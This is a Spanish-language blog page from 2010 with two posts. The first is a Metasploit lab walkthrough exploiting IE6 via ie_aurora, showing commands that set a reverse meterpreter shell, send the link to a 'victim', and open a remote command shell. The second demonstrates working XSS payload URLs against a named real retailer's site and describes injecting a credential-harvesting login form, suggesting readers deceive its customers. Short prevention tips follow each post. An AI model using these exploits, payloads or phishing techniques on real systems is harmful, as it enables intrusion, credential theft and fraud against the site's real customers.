martes, 9 de febrero de 2010

Laboratorio -- Metasploit - Exploit ie_aurora


Bueno creo que todos deben conocer del 0 day que tanto se hablo en estos ultimos tiempos sobre IE, lo que lograba un BOF pudiendo inyectar codigo arbitrario obteniendo una shell, aunque no todos son vulnerables hay una tablita que muestra que tan bien estan parados algunas versiones de windows conjuntamente con la version de IE, mas ahora sabiendo que los antivirus lo detectan..



El laboratorio se compone por una Virtual Machin ( VirtualBox, en el proximo post voy a explicar como intalarlo con yapa de Hacking! ) que tiene intalado un Windows XP SP3 con internet explorer Version 6.0, el cual es totalmente vulnerable. Por suerte es muy raro encontrar clientes navegando con esa version, pero .... :). Je..



Comenzando

Primero entonces nesesitamos el metasploit, lo podemos descargar desde aqui, busquen su arquitectura para linux hay de 32 bit y 64 bit (Yo me descargue este framework-3.3.3-linux-x86_64.run), tambien esta para windows pero el ultimo que baje no tenia el exploit aurora, pero se le puede agregar descargando el archivo con estension rb y colocarlo en la carpeta de exploit/windows/browser que seria lo ideal. Aqui el exploit.
Una vez intalado el metasploit, y que todo haya salido bien ( En linux nesesitamos intalar ruby ), nos dirigimos a la consola de metasploit.

/home/usuario# msfconsole



                                  _       _
_                   | |     (_)_
____   ____| |_  ____  ___ ____ | | ___  _| |_
|    \ / _  )  _)/ _  |/___)  _ \| |/ _ \| |  _)
| | | ( (/ /| |_( ( | |___ | | | | | |_| | | |__
|_|_|_|\____)\___)_||_(___/| ||_/|_|\___/|_|\___)
       |_|


=[ metasploit v3.3.4-dev [core:3.3 api:1.0]
+ -- --=[ 320 exploits - 99 auxiliary
+ -- --=[ 217 payloads - 20 encoders - 6 nops
=[ svn r8438 updated yesterday (2010.02.09)

msf >


Una vez dentro de la consola de Metasploit, tenemos que elegir el exploit a utilizar


msf > use windows/browser/ie_aurora
msf exploit(ie_aurora) > show options

Module options:

Name        Current Setting  Required  Description
----        ---------------  --------  -----------
SRVHOST     0.0.0.0          yes       The local host to
listen on.
SRVPORT     8080             yes       The local port to listen on.
SSL         false            no        Negotiate SSL for incoming connections
SSLVersion  SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
URIPATH                      no        The URI to use for this exploit (default is random)


Exploit target:

Id  Name
--  ----
0   Automatic


Una vez cargado el exploit con el comando use, podemos ver los argumentos que nesesita el exploit para poder funcionar con el comando show options.
Usaremos un PAYLOAD de reverse shell, para ello colocamos lo que sigue.

 msf exploit(ie_aurora) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp

Bien empezamos a llenar los argumentos tanto del Payload como del EXPLOIT



msf exploit(ie_aurora) > set LHOST 190.18x.xxx.xxx
LHOST => 190.18x.xx.xxx
msf exploit(ie_aurora) > set URIPATH /
URIPATH => /
msf exploit(ie_aurora) > show options

Module options:

Name        Current Setting  Required  Description
----        ---------------  --------  -----------
SRVHOST     0.0.0.0          yes       The local host to listen on.
SRVPORT     8080             yes       The local port to listen on.
SSL         false            no        Negotiate SSL for incoming connections
SSLVersion  SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
URIPATH     /                no        The URI to use for this exploit (default is random)


Payload options (windows/meterpreter/reverse_tcp):

Name      Current Setting  Required  Description
----      ---------------  --------  -----------
EXITFUNC  process          yes       Exit technique: seh, thread, process
LHOST     190.18x.xx.xxx   yes       The local address
LPORT     4444             yes       The local port


Exploit target:

Id  Name
--  ----
0   Automatic


En la pantalla se ve como se setearon los valores cargados LHOST vendria a ser la ip del atacante. Largamos el exploit


msf exploit(ie_aurora) > exploit
[*] Exploit running as background job.
msf exploit(ie_aurora) >
[*] Started reverse handler on 190.18x.xx.xxx:4444
[*] Using URL: http://0.0.0.0:8080/
[*]  Local IP: http://190.18x.xx.xxx:8080/
[*] Server started.


El servidor lo tengo corriendo en la IP del argumento LHOST en el puerto 8080 y tendremos una reverse shell por el puerto 4444 :).
Ahora mandamos el enlace a la victima, y esperamos que ingrese.


Veamos nuestra consola de metasploit :)



[*] Sending Microsoft Internet Explorer "Aurora" Memory Corruption to client 190.18x.xx.xxx
[*] Sending stage (725504 bytes)
[*] Meterpreter session 1 opened (190.18x.xx.xxx:4444 -> 190.18x.xx.xxx:51513)
sessions -l

Active sessions
===============

Id  Description  Tunnel
--  -----------  ------
1   Meterpreter  190.18x.xx.xxx:4444 -> 190.18x.xx.xxx:51513

msf exploit(ie_aurora) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > sysinfo
Computer: VICTIMA
OS      : Windows XP (Build 2600, Service Pack 3).
Arch    : x86
Language: es_ES




Vemos que tenemos la session con la victima, que tiene un Windows XP SP3.
Ahora vamos a la shell remota que es lo mejor :)


meterpreter > shell
Process 812 created.
Channel 1 created.
Microsoft Windows XP [Versi�n 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\Victima 10\Escritorio>hostname
hostname
victima

C:\Documents and Settings\Victima 10\Escritorio>


Solucion

Navegar con un antivirus para este exploit seria lo mejor el NOD32 lo detecta y no deja inyectar, tambien no usar un IE explorer anticuado asi como el 6.x que fue hecho en esta POC. Mientras pasen cosas parecidas dejar de utilizar el software defectuoso hasta que la Empresa propietaria del mismo largue el parche, para cada programa siempre hay otro que realiza la misma accion, pudiendo elegirlo a ese temporarlmente.



Referencias:
http://blog.metasploit.com/2010/01/reproducing-aurora-ie-exploit.html

http://foro.elhacker.net/hacking_avanzado/metasploit_0day_ie_exploit_ieaurora-t281678.0.html

Saludos
Publicado por en No hay comentarios:
Etiquetas: , , , , ,

lunes, 1 de febrero de 2010

Pishing a través de XSS (POC Luis A. Cuadrado)

Bueno como anda muy de moda todo lo que es XSS, y la cantidad de sites vulnerables a ellos, voy a mostrar uno de sus tantos usos de engaño.
Primero que es Pishing, es la forma de engañar a la víctima haciéndole creer que esta en un site de confianza cuando en realidad esta en uno maligno, con el fin de poder robar los datos (nombre, usuario, contraseña, numero de tarjeta de crédito, etc.).
Hay una diferencia con respecto al pishing común a lo que es el Pishing a través de XSS. Ejemplo: supongamos que somos cliente de un bancoX, y su pagina de ingreso es http://bancoX.com/login.php, el atacante podría incentivar a la víctima mediante alguna forma de la ingeniería social que ingrese a su sitio maligno hecho por el, haciéndole creer que esta en el original, donde el sitio maligno es http://sitiomaligno/bancoX/login.php.
Entonces una de las formas de verificar siempre si estamos ante un pishing es mirar la dirección de nuestro browser y asegurarnos que estamos donde quisieramos entrar.
El Pishing con XSS, es mucho mas eficiente, ya que el atacante aprovecha la confianza que tiene el cliente con ese dominio, y mediante la inyección de HTML podemos engañar a la persona pidiendo sus datos, y el usuario podrá mirar la dirección de su browser, y efectiva mente estará posicionado en el site correcto de su confianza.

Para un mejor entendimiento voy a mostrar con un site real, que es el Sitio de Luis A. Cuadrado. Esta empresa es por lejos la mas prestigioso de ventas de insumos de informática en Corrientes Capital y Resistencia Chaco, pero pareciera que no le importa mucho la seguridad de sus clientes.
Lo que me llamo la atención fue este enlace, http://www.luiscuadrado.com/login.php, y fue cuando me decidí hacer este articulo.





Siendo usuario del mismo podemos comprar productos y donde los mismos pueden ser enviados al domicilio.

VERIFICANDO LA FALLA

Bien la falla radica en una variable, $products_id, que lo que hace es tomar un numero hacer una consulta a su base de datos, y luego trae la información de el producto correspondiente. Ahora si al pasar el numero $products_id=1249, además de toda la info de dicho articulo con id=1249, el valor se imprime en pantalla sin pasar por algún filtro, :).

Primer Ejemplo: http://www.luiscuadrado.com/product_info.php?products_id=1249%20%3Cscript%3Ealert%28123%29%3C/script%3E

opps!! XSS!!.

Ahora veamos algo mas lindo, y mas detallado lo que hice fue crear un script en php con un formulario pidiendo Email y Clave, y que los datos se guarden en un archivo de texto, la inyección es mediante un iframe.

Segundo Ejemplo: http://www.luiscuadrado.com/product_info.php?products_id=1249%20%3Ciframe%20src=http://www.google.com%20height=%22300%22%20width=%22800%22%3E%3C/iframe%3E

Google en la pagina de cuadrado! je..

Ahora ahí va algo mucho mejor, que vendría hacer lo que estábamos hablando insertar un formulario pidiendo Email y password..






Vean el formulario de logueo, tranquilamente se puede engañar a la gente pidiendo sus claves para luego obtener el ingreso al sistema. (en este momento no esta el link ya voy a subir los php que cree a un server amigo, para que uds lo vean desde su browser). Los datos quedan guardados en un archivo txt.



El escenario esta preparado, lo único que quedaría es usar la imaginacion para engañar a sus clientes. Y quizás tener algunos insumos de informatica mas!! xD


Prevencion:

Todas las variables mostradas por pantalla deberían ser pasadas por filtro, para no tener este tipo de problema, obviamente que todo depende de la calidad del programador, ya que no solo nos enfrentamos con XSS, sino también CRSF o XSRF, donde el que sale perjudicado es el usuario final.
Recomiendo usar agregados como Noscript para el firefox, y siempre estar atento los posibles mail, sms, mensajes por msn, que nos envien a un sitio donde somos usuarios y pidan nuestros datos por alguna razon X, estar seguro que donde estamos es quien dice ser.!


Mas Documentación

http://itfreekzone.blogspot.com/2009/12/cruzando-informacion-cross-site.html

http://itfreekzone.blogspot.com/2009/12/rompiendo-lo-grande-xss-avanzado.html


Saludos!!
Publicado por en 2 comentarios:
Etiquetas: , ,
Suscribirse a: Entradas (Atom)